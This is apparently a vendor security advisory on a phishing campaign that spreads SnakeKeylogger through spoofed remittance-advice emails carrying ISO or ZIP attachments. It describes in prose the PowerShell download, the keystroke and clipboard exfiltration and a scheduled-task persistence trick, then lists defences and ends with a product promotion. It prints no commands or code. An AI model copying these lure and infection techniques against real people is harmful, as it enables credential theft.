Phishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing a

A stealthy info-stealing campaign is deploying SnakeKeylogger malware through phishing emails posing as remittance advice from CPA Global or Clarivate. Spotted on October 7, 2025, the lures use spoofed sender names like "CPA-Payment Files" and subjects such as "remittance advice for the payment dated 07-Oct-2025," urging victims to open attached ISO or ZIP files with a BAT script. These messages include corporate letterhead images for credibility, bypassing basic email filters.

Phishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing aPhishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing a

The infection starts when the BAT executes embedded PowerShell commands to download and run SnakeKeylogger from a remote server. ISO files evade ZIP-only scanners, while the dual-stage setup hides the payload. Once active, the malware logs keystrokes and clipboard data, compressing and exfiltrating it via HTTP POST to attacker-controlled servers using base64 encryption and standard user-agents for stealth.

Phishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing aPhishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing a

For persistence, SnakeKeylogger creates a "SysUpdate" scheduled task running hourly from %TEMP%\update.exe. Attackers use multiple subdomains for reliable C2. To defend: Train users on suspicious payment emails, sandbox attachments, monitor PowerShell and scheduled tasks, and use behavior-based EDR for process injection. Enhance email filters for ISO inspection and block anomalous egress traffic to stop credential theft early.
 
 
NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security